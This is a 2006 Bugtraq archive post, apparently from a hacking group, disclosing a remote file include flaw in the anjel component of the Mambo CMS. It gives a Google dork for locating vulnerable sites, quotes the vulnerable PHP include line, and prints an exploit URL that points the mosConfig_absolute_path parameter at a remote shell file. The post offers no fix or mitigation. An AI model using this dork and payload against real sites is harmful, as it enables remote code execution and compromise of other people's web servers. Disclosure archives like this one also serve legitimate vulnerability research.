Bugtraq mailing list archives

anjel Mambo Component Remote File Include

From: crackers_child () sibersavascilar com
Date: 17 Aug 2006 21:09:36 -0000

!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!
--------------------------------------------------------------------------------

Title : anjel Mambo Component Remote File Include Vulnerabilities

--------------------------------------------------------------------------------
#Author: Crackers_Child


#cont@ct: crackers_child () sibersavascilar com

--------------------------------------------------------------------------------

Google Dorks  : inurl:"/com_anjel/"

------------------------- -------------------------------------------------------

Application :  anjel  Component of Mambo

--------------------------------------------------------------------------------

Bug &#304;n anjel.index.php

 include_once( '../../globals.php' );
 require_once( '../../configuration.php' );
 require_once( $mosConfig_absolute_path . '/includes/joomla.php' ); 

--------------------------------------------------------------------------------

Exploit:

http://[target]/[mambo_path]/components/com_anjel/anjel.index.php?mosConfig_absolute_path=Shell.txt?

--------------------------------------------------------------------------------

greets:

All My Friends And SiberSavascilar.Com Members !

--------------------------------------------------------------------------------


--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------

Current thread:

anjel Mambo Component Remote File Include crackers_child (Aug 18)
- Re: anjel Mambo Component Remote File Include Carsten Eilers (Aug 22)